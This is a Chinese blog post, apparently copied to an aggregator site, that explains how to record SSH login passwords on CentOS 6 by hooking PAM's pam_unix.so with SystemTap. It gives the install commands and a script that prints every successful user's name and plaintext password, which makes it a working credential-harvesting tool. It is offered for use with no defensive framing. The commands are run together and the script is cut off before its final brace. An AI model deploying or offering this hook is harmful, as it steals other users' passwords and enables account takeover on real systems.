linux下监控并实现记录ssh登录密码

编程入门 行业动态 更新时间:2024-10-24 08:30:51

linux下监控并实现记录ssh登录<a href=https://www.elefans.com/category/jswz/34/1771279.html style=密码"/>

linux下监控并实现记录ssh登录密码

测试环境:

Linux 2.6.32-754.25.1.el6.x86_64

CentOS release 6.10 (Final)

 

首先安装systemtap这个包

原理主要是对PAM模块pam_unix.so库文件的函数调用进行捕获,因为用户登录认证需要使用pam_unix.so库文件。

yum --releasever=6.4 updateyum install -y systemtapdebuginfo-install $(rpm -qf /lib/security/pam_unix.so) //64位的机器为lib64目录touch /root/capture_pass.stp

插入代码:

#!/usr/bin/stapglobal username, pass, isSuccRet = 1;probe process("/lib/security/pam_unix.so").function("_unix_verify_password"){username = user_string($name);pass = user_string($p);}probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return{if ($return == 0){printf("User: %s\nPassword: %s\n\n", username, pass);isSuccRet = 0;}

更多推荐

linux下监控并实现记录ssh登录密码

本文发布于:2024-03-06 02:05:36,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1714069.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:密码   linux   ssh

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!